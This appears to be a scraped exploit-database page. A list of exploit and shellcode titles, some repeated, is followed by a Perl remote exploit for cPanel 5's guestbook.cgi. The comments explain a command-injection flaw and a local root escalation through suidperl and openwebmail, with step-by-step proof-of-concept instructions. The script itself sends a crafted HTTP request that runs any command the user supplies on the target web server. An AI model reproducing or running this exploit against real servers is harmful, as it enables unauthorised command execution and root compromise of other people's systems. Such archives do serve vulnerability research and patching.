880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
77 lines
No EOL
2.8 KiB
Perl
Executable file
77 lines
No EOL
2.8 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/6882/info
|
|
|
|
A remote command execution vulnerability has been discovered in the cPanel CGI Application. This issue occurs due to insufficient sanitization of externally supplied data to the 'guestbook.cgi' script.
|
|
|
|
An attacker may exploit this vulnerability to execute commands in the security context of the web server hosting the affected script.
|
|
|
|
This vulnerability has been reported to affect cPanel version 5, previous versions may also be affected.
|
|
|
|
#!/usr/bin/perl
|
|
#
|
|
# ------- start here -------
|
|
#
|
|
# Bug Founded by: pokleyzz
|
|
#
|
|
# Cpanel is web hosting control panel which allow client manage their web account through
|
|
# web interface. Most of the application are written in perl and compiled to binary.
|
|
#
|
|
# Details
|
|
# =======
|
|
# There is multiple vurnerabilities in this package as describe below.
|
|
#
|
|
# 1) Remote command Execution in guestbook.cgi (/usr/local/cpanel/cgi-sys/guestbook.cgi)
|
|
#
|
|
# There is classic perl open function vulnerability in template variable which allow any
|
|
# user to read any file or run command as valid system user which assign to specific url
|
|
# in apache configuration.
|
|
#
|
|
# 2) Local privileges escalation (root)
|
|
#
|
|
# Cpanel come with openwebmail packages as one of web base email reader which suid root.
|
|
# In the system with suid perl install perfectly (with suid mode turn on) local user may
|
|
# include their own perl script when running openwebmail script (oom) through suidperl.
|
|
#
|
|
# Openwebmail will append perl include path (@INC) through SCRIPT_FILENAME environment variable,
|
|
# then include some file when execute.
|
|
#
|
|
# /usr/local/cpanel/base/openwebmail/oom line 14
|
|
#
|
|
# if ( $ENV{'SCRIPT_FILENAME'} =~ m!^(.*?)/[\w\d\-]+\.pl! || $0 =~ m!^(.*?)/[\w\d\-]+\.pl! ) { $SCRIPT_DIR=$1; }
|
|
# if (!$SCRIPT_DIR) { print "Content-type: text/html\n\n\$SCRIPT_DIR not set in CGI script!\n"; exit 0; }
|
|
# push (@INC, $SCRIPT_DIR, ".");
|
|
# .
|
|
# .
|
|
# .
|
|
# require "openwebmail-shared.pl";
|
|
#
|
|
# proof of concept:
|
|
# i) Create file openwebmail-shared.pl contain perl script you want to execute.
|
|
# ii) Set SCRIPT_FILENAME point to full path of openwebmail-shared.pl file you just create.
|
|
# iii) exec oom script (ex: suidperl -T /usr/local/cpanel/base/openwebmail/oom )
|
|
#
|
|
# -------- cut here --------
|
|
#
|
|
# coded by cyzek. cyzek@efnet
|
|
# thanks for p0ng p0ng@brasnet.org
|
|
|
|
$url = $ARGV[0];
|
|
$cmd = $ARGV[1];
|
|
|
|
if(@ARGV != 2){
|
|
print " jozc.pl - Cpanel 5 and below Remote Exploit by cyzek.\n";
|
|
print " use %20 for spaces.\n";
|
|
print " usage: $0 <host> <cmd>\n";
|
|
exit;
|
|
}
|
|
|
|
use IO::Socket::INET;
|
|
$rem = IO::Socket::INET->new(
|
|
Proto => "tcp",
|
|
PeerAddr => $url,
|
|
PeerPort => "80");
|
|
|
|
if ($rem) {
|
|
print $rem "GET /cgi-sys/guestbook.cgi?user=cpanel&template=|$cmd| HTTP/1.0 \n\r\n\r\n\r";
|
|
@resp = <$rem>;
|
|
}
|
|
print "@resp\n\n"; |